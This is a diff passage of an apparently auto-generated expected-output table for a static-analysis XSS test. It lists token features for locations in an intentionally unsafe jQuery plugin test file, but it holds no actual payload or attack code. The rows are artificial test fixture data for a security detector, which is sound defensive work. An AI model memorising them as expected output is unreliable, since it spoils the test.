safe.has(target) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:97:7:97:22 | exceptional return of safe.has(target) | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:97:7:97:22 | exceptional return of safe.has(target) | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:97:7:97:22 | safe.has(target) | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:97:7:97:22 | safe.has(target) | contextSurroundingFunctionParameters | ()\n(options) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:97:7:97:22 | safe.has(target) | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:97:7:97:22 | safe.has(target) | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:97:12:97:14 | has | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:97:12:97:14 | has | contextSurroundingFunctionParameters | ()\n(options) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:97:12:97:14 | has | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:97:12:97:14 | has | fileImports | | | autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:97:16:97:21 | target | CalleeFlexibleAccessPath | safe.has | | autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:97:16:97:21 | target | InputArgumentIndex | 0 | | autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:97:16:97:21 | target | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | @@ -23897,12 +156293,113 @@ tokenFeatures | autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:97:16:97:21 | target | enclosingFunctionName | | | autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:97:16:97:21 | target | fileImports | | | autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:97:16:97:21 | target | receiverName | safe | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:98:4:98:4 | $ | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:98:4:98:4 | $ | contextSurroundingFunctionParameters | ()\n(options) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:98:4:98:4 | $ | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:98:4:98:4 | $ | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:98:4:98:12 | $(target) | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:98:4:98:12 | $(target) | contextSurroundingFunctionParameters | ()\n(options) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:98:4:98:12 | $(target) | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:98:4:98:12 | $(target) | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:98:4:98:12 | exceptional return of $(target) | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:98:4:98:12 | exceptional return of $(target) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:98:4:98:12 | exceptional return of $(target) | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:98:4:98:12 | exceptional return of $(target) | fileImports | | | autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:98:6:98:11 | target | CalleeFlexibleAccessPath | $ | | autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:98:6:98:11 | target | InputArgumentIndex | 0 | | autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:98:6:98:11 | target | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | | autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:98:6:98:11 | target | contextSurroundingFunctionParameters | ()\n(options) | | autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:98:6:98:11 | target | enclosingFunctionName | | | autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:98:6:98:11 | target | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:101:2:101:2 | $ | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:101:2:101:2 | $ | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:101:2:101:2 | $ | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:101:2:101:2 | $ | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:101:2:101:5 | $.fn | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:101:2:101:5 | $.fn | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:101:2:101:5 | $.fn | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:101:2:101:5 | $.fn | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:101:2:101:15 | $.fn.my_plugin | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:101:2:101:15 | $.fn.my_plugin | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:101:2:101:15 | $.fn.my_plugin | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:101:2:101:15 | $.fn.my_plugin | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:101:2:108:2 | $.fn.my ... T OK\\n\\t} | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:101:2:108:2 | $.fn.my ... T OK\\n\\t} | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:101:2:108:2 | $.fn.my ... T OK\\n\\t} | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:101:2:108:2 | $.fn.my ... T OK\\n\\t} | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:101:4:101:5 | fn | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:101:4:101:5 | fn | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:101:4:101:5 | fn | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:101:4:101:5 | fn | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:101:7:101:15 | my_plugin | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:101:7:101:15 | my_plugin | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:101:7:101:15 | my_plugin | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:101:7:101:15 | my_plugin | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:101:19:101:18 | this | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:101:19:101:18 | this | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:101:19:101:18 | this | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:101:19:101:18 | this | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:101:19:108:2 | 'arguments' object of function my_plugin | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:101:19:108:2 | 'arguments' object of function my_plugin | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:101:19:108:2 | 'arguments' object of function my_plugin | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:101:19:108:2 | 'arguments' object of function my_plugin | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:101:19:108:2 | exceptional return of function my_plugin | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:101:19:108:2 | exceptional return of function my_plugin | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:101:19:108:2 | exceptional return of function my_plugin | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:101:19:108:2 | exceptional return of function my_plugin | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:101:19:108:2 | functio ... T OK\\n\\t} | assignedToPropName | my_plugin | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:101:19:108:2 | functio ... T OK\\n\\t} | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:101:19:108:2 | functio ... T OK\\n\\t} | contextSurroundingFunctionParameters | ()\n(options) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:101:19:108:2 | functio ... T OK\\n\\t} | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:101:19:108:2 | functio ... T OK\\n\\t} | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:101:19:108:2 | return of function my_plugin | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:101:19:108:2 | return of function my_plugin | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:101:19:108:2 | return of function my_plugin | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:101:19:108:2 | return of function my_plugin | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:101:28:101:36 | my_plugin | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:101:28:101:36 | my_plugin | contextSurroundingFunctionParameters | ()\n(options) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:101:28:101:36 | my_plugin | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:101:28:101:36 | my_plugin | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:101:38:101:44 | options | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:101:38:101:44 | options | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:101:38:101:44 | options | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:101:38:101:44 | options | contextSurroundingFunctionParameters | ()\n(options) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:101:38:101:44 | options | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:101:38:101:44 | options | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:101:38:101:44 | options | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:101:38:101:44 | options | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:102:3:102:9 | options | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:102:3:102:9 | options | contextSurroundingFunctionParameters | ()\n(options) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:102:3:102:9 | options | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:102:3:102:9 | options | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:102:3:105:13 | options | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:102:3:105:13 | options | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:102:3:105:13 | options | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:102:3:105:13 | options | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:102:3:105:13 | options ... ptions) | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:102:3:105:13 | options ... ptions) | contextSurroundingFunctionParameters | ()\n(options) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:102:3:105:13 | options ... ptions) | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:102:3:105:13 | options ... ptions) | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:102:13:102:13 | $ | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:102:13:102:13 | $ | contextSurroundingFunctionParameters | ()\n(options) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:102:13:102:13 | $ | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:102:13:102:13 | $ | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:102:13:102:20 | $.extend | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:102:13:102:20 | $.extend | contextSurroundingFunctionParameters | ()\n(options) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:102:13:102:20 | $.extend | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:102:13:102:20 | $.extend | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:102:13:105:13 | $.exten ... ptions) | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:102:13:105:13 | $.exten ... ptions) | contextSurroundingFunctionParameters | ()\n(options) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:102:13:105:13 | $.exten ... ptions) | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:102:13:105:13 | $.exten ... ptions) | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:102:13:105:13 | exceptional return of $.exten ... ptions) | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:102:13:105:13 | exceptional return of $.exten ... ptions) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:102:13:105:13 | exceptional return of $.exten ... ptions) | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:102:13:105:13 | exceptional return of $.exten ... ptions) | fileImports | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:102:15:102:20 | extend | contextFunctionInterfaces | f(o)\nf(options)\nf(options)\nmy_plugin(element, options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nmy_plugin(options)\nposition(options)\nsetupPlugin(o) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:102:15:102:20 | extend | contextSurroundingFunctionParameters | ()\n(options) | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:102:15:102:20 | extend | enclosingFunctionName | | +| autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:102:15:102:20 | extend | fileImports | | | autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:102:22:105:3 | {\\n\\t\\t\\tme ... in'\\n\\t\\t} | CalleeFlexibleAccessPath | $.extend | | autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:102:22:105:3 | {\\n\\t\\t\\tme ... in'\\n\\t\\t} | InputArgumentIndex | 0 | | autogenerated/Xss/UnsafeJQueryPlugin/unsafe-jquery-plugin.js:102:22:105:3 | {\\n\\t\\t\\tme ... in'\\n\\t\\t} | 